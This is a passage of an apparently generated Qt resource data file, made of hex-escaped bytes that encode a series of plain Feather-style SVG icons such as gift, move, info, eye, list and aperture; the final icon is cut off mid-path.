\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x67\x69\x66\x74\x22\
\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\
\x73\x3d\x22\x32\x30\x20\x31\x32\x20\x32\x30\x20\x32\x32\x20\x34\
\x20\x32\x32\x20\x34\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x32\x22\
\x20\x79\x3d\x22\x37\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x30\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x35\x22\x3e\x3c\x2f\x72\
\x65\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\
\x22\x20\x79\x31\x3d\x22\x32\x32\x22\x20\x78\x32\x3d\x22\x31\x32\
\x22\x20\x79\x32\x3d\x22\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x32\x20\x37\x48\x37\
\x2e\x35\x61\x32\x2e\x35\x20\x32\x2e\x35\x20\x30\x20\x30\x20\x31\
\x20\x30\x2d\x35\x43\x31\x31\x20\x32\x20\x31\x32\x20\x37\x20\x31\
\x32\x20\x37\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x31\x32\x20\x37\x68\x34\x2e\x35\x61\
\x32\x2e\x35\x20\x32\x2e\x35\x20\x30\x20\x30\x20\x30\x20\x30\x2d\
\x35\x43\x31\x33\x20\x32\x20\x31\x32\x20\x37\x20\x31\x32\x20\x37\
\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x3e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x72\x6e\x65\
\x72\x2d\x64\x6f\x77\x6e\x2d\x72\x69\x67\x68\x74\x22\x3e\x3c\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\
\x31\x35\x20\x31\x30\x20\x32\x30\x20\x31\x35\x20\x31\x35\x20\x32\
\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\
\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x34\x76\x37\x61\x34\x20\
\x34\x20\x30\x20\x30\x20\x30\x20\x34\x20\x34\x68\x31\x32\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xe6\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x6f\x76\x65\x22\
\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\
\x73\x3d\x22\x35\x20\x39\x20\x32\x20\x31\x32\x20\x35\x20\x31\x35\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x39\
\x20\x35\x20\x31\x32\x20\x32\x20\x31\x35\x20\x35\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x35\x20\x31\x39\
\x20\x31\x32\x20\x32\x32\x20\x39\x20\x31\x39\x22\x3e\x3c\x2f\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x39\x20\x39\x20\x32\
\x32\x20\x31\x32\x20\x31\x39\x20\x31\x35\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x32\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\
\x32\x32\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\
\x20\x79\x31\x3d\x22\x32\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\
\x79\x32\x3d\x22\x32\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x4b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x61\x78\x69\x6d\
\x69\x7a\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x38\
\x20\x33\x48\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x32\
\x20\x32\x76\x33\x6d\x31\x38\x20\x30\x56\x35\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x30\x2d\x32\x2d\x32\x68\x2d\x33\x6d\x30\x20\x31\
\x38\x68\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\
\x32\x76\x2d\x33\x4d\x33\x20\x31\x36\x76\x33\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x30\x20\x32\x20\x32\x68\x33\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x69\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x72\x69\x67\x68\x74\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\
\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\
\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\
\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x32\x20\x31\x36\x20\x31\
\x36\x20\x31\x32\x20\x31\x32\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x38\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x31\
\x36\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x5b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x69\x6e\x66\x6f\x22\
\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\
\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x31\x36\x22\x20\x78\
\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x31\x32\x22\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\
\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x38\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x65\x79\x65\x22\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x20\x31\x32\x73\x34\
\x2d\x38\x20\x31\x31\x2d\x38\x20\x31\x31\x20\x38\x20\x31\x31\x20\
\x38\x2d\x34\x20\x38\x2d\x31\x31\x20\x38\x2d\x31\x31\x2d\x38\x2d\
\x31\x31\x2d\x38\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x63\
\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\
\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x33\x22\x3e\x3c\x2f\x63\x69\
\x72\x63\x6c\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xe2\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x69\x73\x74\x22\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\x22\x20\x79\x31\
\x3d\x22\x36\x22\x20\x78\x32\x3d\x22\x32\x31\x22\x20\x79\x32\x3d\
\x22\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\
\x78\x32\x3d\x22\x32\x31\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x38\x22\x20\x78\x32\x3d\x22\
\x32\x31\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x33\x22\x20\
\x79\x31\x3d\x22\x36\x22\x20\x78\x32\x3d\x22\x33\x2e\x30\x31\x22\
\x20\x79\x32\x3d\x22\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x33\x22\x20\x79\x31\x3d\x22\
\x31\x32\x22\x20\x78\x32\x3d\x22\x33\x2e\x30\x31\x22\x20\x79\x32\
\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x33\x22\x20\x79\x31\x3d\x22\x31\x38\
\x22\x20\x78\x32\x3d\x22\x33\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\
\x31\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x39\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x6b\x69\x70\x2d\
\x62\x61\x63\x6b\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\
\x6f\x69\x6e\x74\x73\x3d\x22\x31\x39\x20\x32\x30\x20\x39\x20\x31\
\x32\x20\x31\x39\x20\x34\x20\x31\x39\x20\x32\x30\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x35\x22\x20\x79\x31\x3d\x22\x31\x39\x22\x20\x78\x32\x3d\
\x22\x35\x22\x20\x79\x32\x3d\x22\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x38\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x70\x65\x72\x74\
\x75\x72\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\
\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\
\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x34\x2e\x33\x31\x22\x20\x79\x31\
\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x32\x30\x2e\x30\x35\x22\x20\
\x79\x32\x3d\x22\x31\x37\x2e\x39\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x2e\x36\x39\
\x22\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x32\x31\x2e\
\x31\x37\x22\x20\x79\x32\x3d\x22\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x37\x2e\x33\x38\
\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x31\x33\
\x2e\x31\x32\x22\x20\x79\x32\x3d\x22\x32\x2e\x30\x36\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x39\x2e\x36\x39\x22\x20\x79\x31\x3d\x22\x31\x36\x22\x20\x78\x32\
\x3d\x22\x33\x2e\x39\x35\x22\x20\x79\x32\x3d\x22\x36\x2e\x30\x36\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x34\x2e\x33\x31\x22\x20\x79\x31\x3d\x22\x31\x36\
\x22\x20\x78\x32\x3d\x22\x32\x2e\x38\x33\x22\x20\x79\x32\x3d\x22\
\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x31\x36\x2e\x36\x32\x22\x20\x79\x31\x3d\x22\
\x31\x32\x22\x20\x78\x32\x3d\x22\x31\x30\x2e\x38\x38\x22\x20\x79\
\x32\x3d\x22\x32\x31\x2e\x39\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x69\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x68\x6f\x6e\x65\
\x2d\x6f\x75\x74\x67\x6f\x69\x6e\x67\x22\x3e\x3c\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x33\x20\
\x37\x20\x32\x33\x20\x31\x20\x31\x37\x20\x31\x22\x3e\x3c\x2f\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x31\x36\x22\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\
\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x31\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x32\x20\
\x31\x36\x2e\x39\x32\x76\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x2e\x31\x38\x20\x32\x20\x31\x39\x2e\x37\x39\x20\x31\
\x39\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x38\x2e\x36\x33\x2d\
